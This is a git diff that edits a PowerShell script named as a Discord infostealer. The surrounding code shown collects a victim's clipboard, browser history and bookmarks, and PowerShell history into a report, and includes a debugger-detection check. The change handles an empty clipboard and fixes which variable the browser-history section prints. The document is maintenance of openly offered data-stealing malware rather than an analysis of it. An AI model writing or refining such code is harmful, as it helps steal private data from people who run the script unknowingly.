diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 82e7aa6..2eab879 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -289,6 +289,9 @@ $debugDetect = "Debugging Check : $debugD" $clipboard = Get-Clipboard +if (!($clipboard)){ + $clipboard = "No Data Found.." +} # History and Bookmark Data $Expression = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' $Paths = @{ @@ -489,7 +492,7 @@ $clipboard Browser History --------------------------------------- -$Value +$entry Powershell History ---------------------------------------